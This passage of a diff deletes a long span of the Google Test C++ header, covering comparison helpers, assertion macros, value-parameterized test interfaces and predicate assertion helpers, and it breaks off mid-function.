-// string, and thus want to print it as a pointer to be safe.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-
-// The default case.
-template <typename ToPrint, typename OtherOperand>
-class FormatForComparison {
- public:
-  static ::std::string Format(const ToPrint& value) {
-    return ::testing::PrintToString(value);
-  }
-};
-
-// Array.
-template <typename ToPrint, size_t N, typename OtherOperand>
-class FormatForComparison<ToPrint[N], OtherOperand> {
- public:
-  static ::std::string Format(const ToPrint* value) {
-    return FormatForComparison<const ToPrint*, OtherOperand>::Format(value);
-  }
-};
-
-// By default, print C string as pointers to be safe, as we don't know
-// whether they actually point to a NUL-terminated string.
-
-#define GTEST_IMPL_FORMAT_C_STRING_AS_POINTER_(CharType)                \
-  template <typename OtherOperand>                                      \
-  class FormatForComparison<CharType*, OtherOperand> {                  \
-   public:                                                              \
-    static ::std::string Format(CharType* value) {                      \
-      return ::testing::PrintToString(static_cast<const void*>(value)); \
-    }                                                                   \
-  }
-
-GTEST_IMPL_FORMAT_C_STRING_AS_POINTER_(char);
-GTEST_IMPL_FORMAT_C_STRING_AS_POINTER_(const char);
-GTEST_IMPL_FORMAT_C_STRING_AS_POINTER_(wchar_t);
-GTEST_IMPL_FORMAT_C_STRING_AS_POINTER_(const wchar_t);
-
-#undef GTEST_IMPL_FORMAT_C_STRING_AS_POINTER_
-
-// If a C string is compared with an STL string object, we know it's meant
-// to point to a NUL-terminated string, and thus can print it as a string.
-
-#define GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(CharType, OtherStringType) \
-  template <>                                                           \
-  class FormatForComparison<CharType*, OtherStringType> {               \
-   public:                                                              \
-    static ::std::string Format(CharType* value) {                      \
-      return ::testing::PrintToString(value);                           \
-    }                                                                   \
-  }
-
-GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(char, ::std::string);
-GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(const char, ::std::string);
-
-#if GTEST_HAS_GLOBAL_STRING
-GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(char, ::string);
-GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(const char, ::string);
-#endif
-
-#if GTEST_HAS_GLOBAL_WSTRING
-GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(wchar_t, ::wstring);
-GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(const wchar_t, ::wstring);
-#endif
-
-#if GTEST_HAS_STD_WSTRING
-GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(wchar_t, ::std::wstring);
-GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(const wchar_t, ::std::wstring);
-#endif
-
-#undef GTEST_IMPL_FORMAT_C_STRING_AS_STRING_
-
-// Formats a comparison assertion (e.g. ASSERT_EQ, EXPECT_LT, and etc)
-// operand to be used in a failure message.  The type (but not value)
-// of the other operand may affect the format.  This allows us to
-// print a char* as a raw pointer when it is compared against another
-// char* or void*, and print it as a C string when it is compared
-// against an std::string object, for example.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-template <typename T1, typename T2>
-std::string FormatForComparisonFailureMessage(
-    const T1& value, const T2& /* other_operand */) {
-  return FormatForComparison<T1, T2>::Format(value);
-}
-
-// Separate the error generating code from the code path to reduce the stack
-// frame size of CmpHelperEQ. This helps reduce the overhead of some sanitizers
-// when calling EXPECT_* in a tight loop.
-template <typename T1, typename T2>
-AssertionResult CmpHelperEQFailure(const char* expected_expression,
-                                   const char* actual_expression,
-                                   const T1& expected, const T2& actual) {
-  return EqFailure(expected_expression,
-                   actual_expression,
-                   FormatForComparisonFailureMessage(expected, actual),
-                   FormatForComparisonFailureMessage(actual, expected),
-                   false);
-}
-
-// The helper function for {ASSERT|EXPECT}_EQ.
-template <typename T1, typename T2>
-AssertionResult CmpHelperEQ(const char* expected_expression,
-                            const char* actual_expression,
-                            const T1& expected,
-                            const T2& actual) {
-GTEST_DISABLE_MSC_WARNINGS_PUSH_(4389 /* signed/unsigned mismatch */)
-  if (expected == actual) {
-    return AssertionSuccess();
-  }
-GTEST_DISABLE_MSC_WARNINGS_POP_()
-
-  return CmpHelperEQFailure(expected_expression, actual_expression, expected,
-                            actual);
-}
-
-// With this overloaded version, we allow anonymous enums to be used
-// in {ASSERT|EXPECT}_EQ when compiled with gcc 4, as anonymous enums
-// can be implicitly cast to BiggestInt.
-GTEST_API_ AssertionResult CmpHelperEQ(const char* expected_expression,
-                                       const char* actual_expression,
-                                       BiggestInt expected,
-                                       BiggestInt actual);
-
-// The helper class for {ASSERT|EXPECT}_EQ.  The template argument
-// lhs_is_null_literal is true iff the first argument to ASSERT_EQ()
-// is a null pointer literal.  The following default implementation is
-// for lhs_is_null_literal being false.
-template <bool lhs_is_null_literal>
-class EqHelper {
- public:
-  // This templatized version is for the general case.
-  template <typename T1, typename T2>
-  static AssertionResult Compare(const char* expected_expression,
-                                 const char* actual_expression,
-                                 const T1& expected,
-                                 const T2& actual) {
-    return CmpHelperEQ(expected_expression, actual_expression, expected,
-                       actual);
-  }
-
-  // With this overloaded version, we allow anonymous enums to be used
-  // in {ASSERT|EXPECT}_EQ when compiled with gcc 4, as anonymous
-  // enums can be implicitly cast to BiggestInt.
-  //
-  // Even though its body looks the same as the above version, we
-  // cannot merge the two, as it will make anonymous enums unhappy.
-  static AssertionResult Compare(const char* expected_expression,
-                                 const char* actual_expression,
-                                 BiggestInt expected,
-                                 BiggestInt actual) {
-    return CmpHelperEQ(expected_expression, actual_expression, expected,
-                       actual);
-  }
-};
-
-// This specialization is used when the first argument to ASSERT_EQ()
-// is a null pointer literal, like NULL, false, or 0.
-template <>
-class EqHelper<true> {
- public:
-  // We define two overloaded versions of Compare().  The first
-  // version will be picked when the second argument to ASSERT_EQ() is
-  // NOT a pointer, e.g. ASSERT_EQ(0, AnIntFunction()) or
-  // EXPECT_EQ(false, a_bool).
-  template <typename T1, typename T2>
-  static AssertionResult Compare(
-      const char* expected_expression,
-      const char* actual_expression,
-      const T1& expected,
-      const T2& actual,
-      // The following line prevents this overload from being considered if T2
-      // is not a pointer type.  We need this because ASSERT_EQ(NULL, my_ptr)
-      // expands to Compare("", "", NULL, my_ptr), which requires a conversion
-      // to match the Secret* in the other overload, which would otherwise make
-      // this template match better.
-      typename EnableIf<!is_pointer<T2>::value>::type* = 0) {
-    return CmpHelperEQ(expected_expression, actual_expression, expected,
-                       actual);
-  }
-
-  // This version will be picked when the second argument to ASSERT_EQ() is a
-  // pointer, e.g. ASSERT_EQ(NULL, a_pointer).
-  template <typename T>
-  static AssertionResult Compare(
-      const char* expected_expression,
-      const char* actual_expression,
-      // We used to have a second template parameter instead of Secret*.  That
-      // template parameter would deduce to 'long', making this a better match
-      // than the first overload even without the first overload's EnableIf.
-      // Unfortunately, gcc with -Wconversion-null warns when "passing NULL to
-      // non-pointer argument" (even a deduced integral argument), so the old
-      // implementation caused warnings in user code.
-      Secret* /* expected (NULL) */,
-      T* actual) {
-    // We already know that 'expected' is a null pointer.
-    return CmpHelperEQ(expected_expression, actual_expression,
-                       static_cast<T*>(NULL), actual);
-  }
-};
-
-// Separate the error generating code from the code path to reduce the stack
-// frame size of CmpHelperOP. This helps reduce the overhead of some sanitizers
-// when calling EXPECT_OP in a tight loop.
-template <typename T1, typename T2>
-AssertionResult CmpHelperOpFailure(const char* expr1, const char* expr2,
-                                   const T1& val1, const T2& val2,
-                                   const char* op) {
-  return AssertionFailure()
-         << "Expected: (" << expr1 << ") " << op << " (" << expr2
-         << "), actual: " << FormatForComparisonFailureMessage(val1, val2)
-         << " vs " << FormatForComparisonFailureMessage(val2, val1);
-}
-
-// A macro for implementing the helper functions needed to implement
-// ASSERT_?? and EXPECT_??.  It is here just to avoid copy-and-paste
-// of similar code.
-//
-// For each templatized helper function, we also define an overloaded
-// version for BiggestInt in order to reduce code bloat and allow
-// anonymous enums to be used with {ASSERT|EXPECT}_?? when compiled
-// with gcc 4.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-
-#define GTEST_IMPL_CMP_HELPER_(op_name, op)\
-template <typename T1, typename T2>\
-AssertionResult CmpHelper##op_name(const char* expr1, const char* expr2, \
-                                   const T1& val1, const T2& val2) {\
-  if (val1 op val2) {\
-    return AssertionSuccess();\
-  } else {\
-    return CmpHelperOpFailure(expr1, expr2, val1, val2, #op);\
-  }\
-}\
-GTEST_API_ AssertionResult CmpHelper##op_name(\
-    const char* expr1, const char* expr2, BiggestInt val1, BiggestInt val2)
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-
-// Implements the helper function for {ASSERT|EXPECT}_NE
-GTEST_IMPL_CMP_HELPER_(NE, !=);
-// Implements the helper function for {ASSERT|EXPECT}_LE
-GTEST_IMPL_CMP_HELPER_(LE, <=);
-// Implements the helper function for {ASSERT|EXPECT}_LT
-GTEST_IMPL_CMP_HELPER_(LT, <);
-// Implements the helper function for {ASSERT|EXPECT}_GE
-GTEST_IMPL_CMP_HELPER_(GE, >=);
-// Implements the helper function for {ASSERT|EXPECT}_GT
-GTEST_IMPL_CMP_HELPER_(GT, >);
-
-#undef GTEST_IMPL_CMP_HELPER_
-
-// The helper function for {ASSERT|EXPECT}_STREQ.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-GTEST_API_ AssertionResult CmpHelperSTREQ(const char* expected_expression,
-                                          const char* actual_expression,
-                                          const char* expected,
-                                          const char* actual);
-
-// The helper function for {ASSERT|EXPECT}_STRCASEEQ.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-GTEST_API_ AssertionResult CmpHelperSTRCASEEQ(const char* expected_expression,
-                                              const char* actual_expression,
-                                              const char* expected,
-                                              const char* actual);
-
-// The helper function for {ASSERT|EXPECT}_STRNE.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-GTEST_API_ AssertionResult CmpHelperSTRNE(const char* s1_expression,
-                                          const char* s2_expression,
-                                          const char* s1,
-                                          const char* s2);
-
-// The helper function for {ASSERT|EXPECT}_STRCASENE.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-GTEST_API_ AssertionResult CmpHelperSTRCASENE(const char* s1_expression,
-                                              const char* s2_expression,
-                                              const char* s1,
-                                              const char* s2);
-
-
-// Helper function for *_STREQ on wide strings.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-GTEST_API_ AssertionResult CmpHelperSTREQ(const char* expected_expression,
-                                          const char* actual_expression,
-                                          const wchar_t* expected,
-                                          const wchar_t* actual);
-
-// Helper function for *_STRNE on wide strings.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-GTEST_API_ AssertionResult CmpHelperSTRNE(const char* s1_expression,
-                                          const char* s2_expression,
-                                          const wchar_t* s1,
-                                          const wchar_t* s2);
-
-}  // namespace internal
-
-// IsSubstring() and IsNotSubstring() are intended to be used as the
-// first argument to {EXPECT,ASSERT}_PRED_FORMAT2(), not by
-// themselves.  They check whether needle is a substring of haystack
-// (NULL is considered a substring of itself only), and return an
-// appropriate error message when they fail.
-//
-// The {needle,haystack}_expr arguments are the stringified
-// expressions that generated the two real arguments.
-GTEST_API_ AssertionResult IsSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const char* needle, const char* haystack);
-GTEST_API_ AssertionResult IsSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const wchar_t* needle, const wchar_t* haystack);
-GTEST_API_ AssertionResult IsNotSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const char* needle, const char* haystack);
-GTEST_API_ AssertionResult IsNotSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const wchar_t* needle, const wchar_t* haystack);
-GTEST_API_ AssertionResult IsSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const ::std::string& needle, const ::std::string& haystack);
-GTEST_API_ AssertionResult IsNotSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const ::std::string& needle, const ::std::string& haystack);
-
-#if GTEST_HAS_STD_WSTRING
-GTEST_API_ AssertionResult IsSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const ::std::wstring& needle, const ::std::wstring& haystack);
-GTEST_API_ AssertionResult IsNotSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const ::std::wstring& needle, const ::std::wstring& haystack);
-#endif  // GTEST_HAS_STD_WSTRING
-
-namespace internal {
-
-// Helper template function for comparing floating-points.
-//
-// Template parameter:
-//
-//   RawType: the raw floating-point type (either float or double)
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-template <typename RawType>
-AssertionResult CmpHelperFloatingPointEQ(const char* expected_expression,
-                                         const char* actual_expression,
-                                         RawType expected,
-                                         RawType actual) {
-  const FloatingPoint<RawType> lhs(expected), rhs(actual);
-
-  if (lhs.AlmostEquals(rhs)) {
-    return AssertionSuccess();
-  }
-
-  ::std::stringstream expected_ss;
-  expected_ss << std::setprecision(std::numeric_limits<RawType>::digits10 + 2)
-              << expected;
-
-  ::std::stringstream actual_ss;
-  actual_ss << std::setprecision(std::numeric_limits<RawType>::digits10 + 2)
-            << actual;
-
-  return EqFailure(expected_expression,
-                   actual_expression,
-                   StringStreamToString(&expected_ss),
-                   StringStreamToString(&actual_ss),
-                   false);
-}
-
-// Helper function for implementing ASSERT_NEAR.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-GTEST_API_ AssertionResult DoubleNearPredFormat(const char* expr1,
-                                                const char* expr2,
-                                                const char* abs_error_expr,
-                                                double val1,
-                                                double val2,
-                                                double abs_error);
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-// A class that enables one to stream messages to assertion macros
-class GTEST_API_ AssertHelper {
- public:
-  // Constructor.
-  AssertHelper(TestPartResult::Type type,
-               const char* file,
-               int line,
-               const char* message);
-  ~AssertHelper();
-
-  // Message assignment is a semantic trick to enable assertion
-  // streaming; see the GTEST_MESSAGE_ macro below.
-  void operator=(const Message& message) const;
-
- private:
-  // We put our data in a struct so that the size of the AssertHelper class can
-  // be as small as possible.  This is important because gcc is incapable of
-  // re-using stack space even for temporary variables, so every EXPECT_EQ
-  // reserves stack space for another AssertHelper.
-  struct AssertHelperData {
-    AssertHelperData(TestPartResult::Type t,
-                     const char* srcfile,
-                     int line_num,
-                     const char* msg)
-        : type(t), file(srcfile), line(line_num), message(msg) { }
-
-    TestPartResult::Type const type;
-    const char* const file;
-    int const line;
-    std::string const message;
-
-   private:
-    GTEST_DISALLOW_COPY_AND_ASSIGN_(AssertHelperData);
-  };
-
-  AssertHelperData* const data_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(AssertHelper);
-};
-
-}  // namespace internal
-
-#if GTEST_HAS_PARAM_TEST
-// The pure interface class that all value-parameterized tests inherit from.
-// A value-parameterized class must inherit from both ::testing::Test and
-// ::testing::WithParamInterface. In most cases that just means inheriting
-// from ::testing::TestWithParam, but more complicated test hierarchies
-// may need to inherit from Test and WithParamInterface at different levels.
-//
-// This interface has support for accessing the test parameter value via
-// the GetParam() method.
-//
-// Use it with one of the parameter generator defining functions, like Range(),
-// Values(), ValuesIn(), Bool(), and Combine().
-//
-// class FooTest : public ::testing::TestWithParam<int> {
-//  protected:
-//   FooTest() {
-//     // Can use GetParam() here.
-//   }
-//   virtual ~FooTest() {
-//     // Can use GetParam() here.
-//   }
-//   virtual void SetUp() {
-//     // Can use GetParam() here.
-//   }
-//   virtual void TearDown {
-//     // Can use GetParam() here.
-//   }
-// };
-// TEST_P(FooTest, DoesBar) {
-//   // Can use GetParam() method here.
-//   Foo foo;
-//   ASSERT_TRUE(foo.DoesBar(GetParam()));
-// }
-// INSTANTIATE_TEST_CASE_P(OneToTenRange, FooTest, ::testing::Range(1, 10));
-
-template <typename T>
-class WithParamInterface {
- public:
-  typedef T ParamType;
-  virtual ~WithParamInterface() {}
-
-  // The current parameter value. Is also available in the test fixture's
-  // constructor. This member function is non-static, even though it only
-  // references static data, to reduce the opportunity for incorrect uses
-  // like writing 'WithParamInterface<bool>::GetParam()' for a test that
-  // uses a fixture whose parameter type is int.
-  const ParamType& GetParam() const {
-    GTEST_CHECK_(parameter_ != NULL)
-        << "GetParam() can only be called inside a value-parameterized test "
-        << "-- did you intend to write TEST_P instead of TEST_F?";
-    return *parameter_;
-  }
-
- private:
-  // Sets parameter value. The caller is responsible for making sure the value
-  // remains alive and unchanged throughout the current test.
-  static void SetParam(const ParamType* parameter) {
-    parameter_ = parameter;
-  }
-
-  // Static value used for accessing parameter during a test lifetime.
-  static const ParamType* parameter_;
-
-  // TestClass must be a subclass of WithParamInterface<T> and Test.
-  template <class TestClass> friend class internal::ParameterizedTestFactory;
-};
-
-template <typename T>
-const T* WithParamInterface<T>::parameter_ = NULL;
-
-// Most value-parameterized classes can ignore the existence of
-// WithParamInterface, and can just inherit from ::testing::TestWithParam.
-
-template <typename T>
-class TestWithParam : public Test, public WithParamInterface<T> {
-};
-
-#endif  // GTEST_HAS_PARAM_TEST
-
-// Macros for indicating success/failure in test code.
-
-// ADD_FAILURE unconditionally adds a failure to the current test.
-// SUCCEED generates a success - it doesn't automatically make the
-// current test successful, as a test is only successful when it has
-// no failure.
-//
-// EXPECT_* verifies that a certain condition is satisfied.  If not,
-// it behaves like ADD_FAILURE.  In particular:
-//
-//   EXPECT_TRUE  verifies that a Boolean condition is true.
-//   EXPECT_FALSE verifies that a Boolean condition is false.
-//
-// FAIL and ASSERT_* are similar to ADD_FAILURE and EXPECT_*, except
-// that they will also abort the current function on failure.  People
-// usually want the fail-fast behavior of FAIL and ASSERT_*, but those
-// writing data-driven tests often find themselves using ADD_FAILURE
-// and EXPECT_* more.
-
-// Generates a nonfatal failure with a generic message.
-#define ADD_FAILURE() GTEST_NONFATAL_FAILURE_("Failed")
-
-// Generates a nonfatal failure at the given source file location with
-// a generic message.
-#define ADD_FAILURE_AT(file, line) \
-  GTEST_MESSAGE_AT_(file, line, "Failed", \
-                    ::testing::TestPartResult::kNonFatalFailure)
-
-// Generates a fatal failure with a generic message.
-#define GTEST_FAIL() GTEST_FATAL_FAILURE_("Failed")
-
-// Define this macro to 1 to omit the definition of FAIL(), which is a
-// generic name and clashes with some other libraries.
-#if !GTEST_DONT_DEFINE_FAIL
-# define FAIL() GTEST_FAIL()
-#endif
-
-// Generates a success with a generic message.
-#define GTEST_SUCCEED() GTEST_SUCCESS_("Succeeded")
-
-// Define this macro to 1 to omit the definition of SUCCEED(), which
-// is a generic name and clashes with some other libraries.
-#if !GTEST_DONT_DEFINE_SUCCEED
-# define SUCCEED() GTEST_SUCCEED()
-#endif
-
-// Macros for testing exceptions.
-//
-//    * {ASSERT|EXPECT}_THROW(statement, expected_exception):
-//         Tests that the statement throws the expected exception.
-//    * {ASSERT|EXPECT}_NO_THROW(statement):
-//         Tests that the statement doesn't throw any exception.
-//    * {ASSERT|EXPECT}_ANY_THROW(statement):
-//         Tests that the statement throws an exception.
-
-#define EXPECT_THROW(statement, expected_exception) \
-  GTEST_TEST_THROW_(statement, expected_exception, GTEST_NONFATAL_FAILURE_)
-#define EXPECT_NO_THROW(statement) \
-  GTEST_TEST_NO_THROW_(statement, GTEST_NONFATAL_FAILURE_)
-#define EXPECT_ANY_THROW(statement) \
-  GTEST_TEST_ANY_THROW_(statement, GTEST_NONFATAL_FAILURE_)
-#define ASSERT_THROW(statement, expected_exception) \
-  GTEST_TEST_THROW_(statement, expected_exception, GTEST_FATAL_FAILURE_)
-#define ASSERT_NO_THROW(statement) \
-  GTEST_TEST_NO_THROW_(statement, GTEST_FATAL_FAILURE_)
-#define ASSERT_ANY_THROW(statement) \
-  GTEST_TEST_ANY_THROW_(statement, GTEST_FATAL_FAILURE_)
-
-// Boolean assertions. Condition can be either a Boolean expression or an
-// AssertionResult. For more information on how to use AssertionResult with
-// these macros see comments on that class.
-#define EXPECT_TRUE(condition) \
-  GTEST_TEST_BOOLEAN_(condition, #condition, false, true, \
-                      GTEST_NONFATAL_FAILURE_)
-#define EXPECT_FALSE(condition) \
-  GTEST_TEST_BOOLEAN_(!(condition), #condition, true, false, \
-                      GTEST_NONFATAL_FAILURE_)
-#define ASSERT_TRUE(condition) \
-  GTEST_TEST_BOOLEAN_(condition, #condition, false, true, \
-                      GTEST_FATAL_FAILURE_)
-#define ASSERT_FALSE(condition) \
-  GTEST_TEST_BOOLEAN_(!(condition), #condition, true, false, \
-                      GTEST_FATAL_FAILURE_)
-
-// Includes the auto-generated header that implements a family of
-// generic predicate assertion macros.
-// Copyright 2006, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-// This file is AUTOMATICALLY GENERATED on 10/31/2011 by command
-// 'gen_gtest_pred_impl.py 5'.  DO NOT EDIT BY HAND!
-//
-// Implements a family of generic predicate assertion macros.
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
-#define GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
-
-// Makes sure this header is not included before gtest.h.
-#ifndef GTEST_INCLUDE_GTEST_GTEST_H_
-# error Do not include gtest_pred_impl.h directly.  Include gtest.h instead.
-#endif  // GTEST_INCLUDE_GTEST_GTEST_H_
-
-// This header implements a family of generic predicate assertion
-// macros:
-//
-//   ASSERT_PRED_FORMAT1(pred_format, v1)
-//   ASSERT_PRED_FORMAT2(pred_format, v1, v2)
-//   ...
-//
-// where pred_format is a function or functor that takes n (in the
-// case of ASSERT_PRED_FORMATn) values and their source expression
-// text, and returns a testing::AssertionResult.  See the definition
-// of ASSERT_EQ in gtest.h for an example.
-//
-// If you don't care about formatting, you can use the more
-// restrictive version:
-//
-//   ASSERT_PRED1(pred, v1)
-//   ASSERT_PRED2(pred, v1, v2)
-//   ...
-//
-// where pred is an n-ary function or functor that returns bool,
-// and the values v1, v2, ..., must support the << operator for
-// streaming to std::ostream.
-//
-// We also define the EXPECT_* variations.
-//
-// For now we only support predicates whose arity is at most 5.
-// Please email googletestframework@googlegroups.com if you need
-// support for higher arities.
-
-// GTEST_ASSERT_ is the basic statement to which all of the assertions
-// in this file reduce.  Don't use this in your code.
-
-#define GTEST_ASSERT_(expression, on_failure) \
-  GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-  if (const ::testing::AssertionResult gtest_ar = (expression)) \
-    ; \
-  else \
-    on_failure(gtest_ar.failure_message())
-
-
-// Helper function for implementing {EXPECT|ASSERT}_PRED1.  Don't use
-// this in your code.
-template <typename Pred,
-          typename T1>
-AssertionResult AssertPred1Helper(const char* pred_text,
-                                  const char* e1,
-                                  Pred pred,
-                                  const T1& v1) {
-  if (pred(v1)) return AssertionSuccess();
-
-  return AssertionFailure() << pred_text << "("
-                            << e1 << ") evaluates to false, where"
-                            << "\n" << e1 << " evaluates to " << v1;
-}
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED_FORMAT1.
-// Don't use this in your code.
-#define GTEST_PRED_FORMAT1_(pred_format, v1, on_failure)\
-  GTEST_ASSERT_(pred_format(#v1, v1), \
-                on_failure)
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED1.  Don't use
-// this in your code.
-#define GTEST_PRED1_(pred, v1, on_failure)\
-  GTEST_ASSERT_(::testing::AssertPred1Helper(#pred, \
-                                             #v1, \
-                                             pred, \
-                                             v1), on_failure)
-
-// Unary predicate assertion macros.
-#define EXPECT_PRED_FORMAT1(pred_format, v1) \
-  GTEST_PRED_FORMAT1_(pred_format, v1, GTEST_NONFATAL_FAILURE_)
-#define EXPECT_PRED1(pred, v1) \
-  GTEST_PRED1_(pred, v1, GTEST_NONFATAL_FAILURE_)
-#define ASSERT_PRED_FORMAT1(pred_format, v1) \
-  GTEST_PRED_FORMAT1_(pred_format, v1, GTEST_FATAL_FAILURE_)
-#define ASSERT_PRED1(pred, v1) \
-  GTEST_PRED1_(pred, v1, GTEST_FATAL_FAILURE_)
-
-
-
-// Helper function for implementing {EXPECT|ASSERT}_PRED2.  Don't use
-// this in your code.
-template <typename Pred,
-          typename T1,
-          typename T2>
-AssertionResult AssertPred2Helper(const char* pred_text,
-                                  const char* e1,
-                                  const char* e2,
-                                  Pred pred,
-                                  const T1& v1,
-                                  const T2& v2) {
-  if (pred(v1, v2)) return AssertionSuccess();
-
-  return AssertionFailure() << pred_text << "("
-                            << e1 << ", "
-                            << e2 << ") evaluates to false, where"
-                            << "\n" << e1 << " evaluates to " << v1
-                            << "\n" << e2 << " evaluates to " << v2;
-}
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED_FORMAT2.
-// Don't use this in your code.
-#define GTEST_PRED_FORMAT2_(pred_format, v1, v2, on_failure)\
-  GTEST_ASSERT_(pred_format(#v1, #v2, v1, v2), \
-                on_failure)
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED2.  Don't use
-// this in your code.
-#define GTEST_PRED2_(pred, v1, v2, on_failure)\
-  GTEST_ASSERT_(::testing::AssertPred2Helper(#pred, \
-                                             #v1, \
-                                             #v2, \
-                                             pred, \
-                                             v1, \
-                                             v2), on_failure)
-
-// Binary predicate assertion macros.
-#define EXPECT_PRED_FORMAT2(pred_format, v1, v2) \
-  GTEST_PRED_FORMAT2_(pred_format, v1, v2, GTEST_NONFATAL_FAILURE_)
-#define EXPECT_PRED2(pred, v1, v2) \
-  GTEST_PRED2_(pred, v1, v2, GTEST_NONFATAL_FAILURE_)
-#define ASSERT_PRED_FORMAT2(pred_format, v1, v2) \
-  GTEST_PRED_FORMAT2_(pred_format, v1, v2, GTEST_FATAL_FAILURE_)
-#define ASSERT_PRED2(pred, v1, v2) \
-  GTEST_PRED2_(pred, v1, v2, GTEST_FATAL_FAILURE_)
-
-
-
-// Helper function for implementing {EXPECT|ASSERT}_PRED3.  Don't use
-// this in your code.
-template <typename Pred,
-          typename T1,
-          typename T2,
-          typename T3>
-AssertionResult AssertPred3Helper(const char* pred_text,
-                                  const char* e1,
-                                  const char* e2,
-                                  const char* e3,
-                                  Pred pred,
-                                  const T1& v1,
-                                  const T2& v2,
-                                  const T3& v3) {
-  if (pred(v1, v2, v3)) return AssertionSuccess();
-
-  return AssertionFailure() << pred_text << "("
-                            << e1 << ", "
-                            << e2 << ", "
-                            << e3 << ") evaluates to false, where"
-                            << "\n" << e1 << " evaluates to " << v1
-                            << "\n" << e2 << " evaluates to " << v2
-                            << "\n" << e3 << " evaluates to " << v3;
-}
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED_FORMAT3.
-// Don't use this in your code.
-#define GTEST_PRED_FORMAT3_(pred_format, v1, v2, v3, on_failure)\
-  GTEST_ASSERT_(pred_format(#v1, #v2, #v3, v1, v2, v3), \
-                on_failure)
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED3.  Don't use
-// this in your code.
-#define GTEST_PRED3_(pred, v1, v2, v3, on_failure)\
-  GTEST_ASSERT_(::testing::AssertPred3Helper(#pred, \
-                                             #v1, \
-                                             #v2, \
-                                             #v3, \
-                                             pred, \
-                                             v1, \
-                                             v2, \
-                                             v3), on_failure)
-
-// Ternary predicate assertion macros.
-#define EXPECT_PRED_FORMAT3(pred_format, v1, v2, v3) \
-  GTEST_PRED_FORMAT3_(pred_format, v1, v2, v3, GTEST_NONFATAL_FAILURE_)
-#define EXPECT_PRED3(pred, v1, v2, v3) \
-  GTEST_PRED3_(pred, v1, v2, v3, GTEST_NONFATAL_FAILURE_)
-#define ASSERT_PRED_FORMAT3(pred_format, v1, v2, v3) \
-  GTEST_PRED_FORMAT3_(pred_format, v1, v2, v3, GTEST_FATAL_FAILURE_)
-#define ASSERT_PRED3(pred, v1, v2, v3) \
-  GTEST_PRED3_(pred, v1, v2, v3, GTEST_FATAL_FAILURE_)
-
-
-
-// Helper function for implementing {EXPECT|ASSERT}_PRED4.  Don't use
-// this in your code.
-template <typename Pred,
-          typename T1,
-          typename T2,
-          typename T3,
-          typename T4>
-AssertionResult AssertPred4Helper(const char* pred_text,
-                                  const char* e1,
-                                  const char* e2,
-                                  const char* e3,
-                                  const char* e4,
-                                  Pred pred,
-                                  const T1& v1,
-                                  const T2& v2,
-                                  const T3& v3,
-                                  const T4& v4) {
